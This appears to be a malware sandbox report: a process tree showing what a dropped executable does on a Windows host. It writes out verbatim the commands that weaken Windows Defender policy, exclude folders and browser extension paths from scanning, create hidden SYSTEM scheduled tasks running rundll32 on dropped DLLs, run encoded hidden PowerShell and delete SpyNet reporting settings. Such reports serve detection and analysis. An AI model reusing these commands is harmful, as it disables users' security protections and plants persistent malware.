C:\Users\Admin\AppData\Local\Temp\qeOxabDhDvCCKUygJ\MfJxEgkARsuSvOa\hTmuITj.exeC:\Users\Admin\AppData\Local\Temp\qeOxabDhDvCCKUygJ\MfJxEgkARsuSvOa\hTmuITj.exe Qp /sqsite_idINQ 385118 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:4708 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3280 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
- Suspicious use of WriteProcessMemory
PID:3168 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:2424
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:4076
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:980
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:236
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:1040
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:3400
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:2564
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:2592
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:4860
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:1428
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:4448
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:1684
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:3976
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:1136
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:3520
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:2192
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:4504
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:2452
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:2264
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:1340
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:3592
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:1880
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:3412
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:352
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵PID:4584
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵PID:700
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵PID:460
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵PID:4524
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DyYwGMOhU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DyYwGMOhU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\NEwrPvSGentU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\NEwrPvSGentU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\iRMzUYCAhkbMC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\iRMzUYCAhkbMC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\oZARwjxMcMUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\oZARwjxMcMUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wqRDBEtPSAXhoJHUBaR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wqRDBEtPSAXhoJHUBaR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\nFdGJOiAxzTYZTVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\nFdGJOiAxzTYZTVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\qeOxabDhDvCCKUygJ\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\qeOxabDhDvCCKUygJ\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\AZgKexhzWxKGMSOL\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\AZgKexhzWxKGMSOL\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1944 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DyYwGMOhU" /t REG_DWORD /d 0 /reg:323⤵PID:3992
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DyYwGMOhU" /t REG_DWORD /d 0 /reg:324⤵PID:4404
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DyYwGMOhU" /t REG_DWORD /d 0 /reg:643⤵PID:3440
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NEwrPvSGentU2" /t REG_DWORD /d 0 /reg:323⤵PID:2292
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NEwrPvSGentU2" /t REG_DWORD /d 0 /reg:643⤵PID:1632
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\iRMzUYCAhkbMC" /t REG_DWORD /d 0 /reg:323⤵PID:2124
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\iRMzUYCAhkbMC" /t REG_DWORD /d 0 /reg:643⤵PID:1176
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oZARwjxMcMUn" /t REG_DWORD /d 0 /reg:323⤵PID:3052
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oZARwjxMcMUn" /t REG_DWORD /d 0 /reg:643⤵PID:3860
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wqRDBEtPSAXhoJHUBaR" /t REG_DWORD /d 0 /reg:323⤵PID:3968
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wqRDBEtPSAXhoJHUBaR" /t REG_DWORD /d 0 /reg:643⤵PID:2008
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\nFdGJOiAxzTYZTVB /t REG_DWORD /d 0 /reg:323⤵PID:2276
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\nFdGJOiAxzTYZTVB /t REG_DWORD /d 0 /reg:643⤵PID:3712
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:2876
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:4160
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:732
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:4744
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\qeOxabDhDvCCKUygJ /t REG_DWORD /d 0 /reg:323⤵PID:4128
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\qeOxabDhDvCCKUygJ /t REG_DWORD /d 0 /reg:643⤵PID:1640
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\AZgKexhzWxKGMSOL /t REG_DWORD /d 0 /reg:323⤵PID:2288
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\AZgKexhzWxKGMSOL /t REG_DWORD /d 0 /reg:643⤵PID:4680
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gzQhMuStJ" /SC once /ST 03:01:47 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
PID:4944
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gzQhMuStJ"2⤵PID:4388
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gzQhMuStJ"2⤵PID:764
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "vFsADyudLcNCFLIiL" /SC once /ST 13:06:41 /RU "SYSTEM" /TR "\"C:\Windows\Temp\AZgKexhzWxKGMSOL\jXDyBTktHXvIFQm\FVAhqSI.exe\" Ne /utsite_idzox 385118 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1464
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "vFsADyudLcNCFLIiL"2⤵PID:4940
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1864 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:3380
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:2372
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1668
-
C:\Windows\Temp\AZgKexhzWxKGMSOL\jXDyBTktHXvIFQm\FVAhqSI.exeC:\Windows\Temp\AZgKexhzWxKGMSOL\jXDyBTktHXvIFQm\FVAhqSI.exe Ne /utsite_idzox 385118 /S1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:2204 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bNoYxGgNiGReyhFIfY"2⤵PID:1524
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵PID:1980
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:3904
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵PID:4176
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:3168
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\DyYwGMOhU\tirYsZ.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "DQYxzwqpnFjMWpp" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:4076
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "DQYxzwqpnFjMWpp2" /F /xml "C:\Program Files (x86)\DyYwGMOhU\cJKFcgV.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:2424
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "DQYxzwqpnFjMWpp"2⤵PID:236
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "DQYxzwqpnFjMWpp"2⤵PID:2260
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ErFLQwbOwAPnds" /F /xml "C:\Program Files (x86)\NEwrPvSGentU2\nkSnGdL.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:3796
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "JNDkwYKtRGCRi2" /F /xml "C:\ProgramData\nFdGJOiAxzTYZTVB\nmAnSHt.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4360
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "aFiSxxkLgMkoDeABA2" /F /xml "C:\Program Files (x86)\wqRDBEtPSAXhoJHUBaR\hHOEUOV.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4880
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "XuRScOFPNbKOgbhScQj2" /F /xml "C:\Program Files (x86)\iRMzUYCAhkbMC\iYXrkuO.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4584
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "LPyXfDhiQUyhASpny" /SC once /ST 15:16:44 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\AZgKexhzWxKGMSOL\jTphKxdH\FbbEXZg.dll\",#1 /Nwsite_idbpL 385118" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:744
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "LPyXfDhiQUyhASpny"2⤵PID:2228
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:322⤵PID:2160
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵PID:4876
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:642⤵PID:1512
-
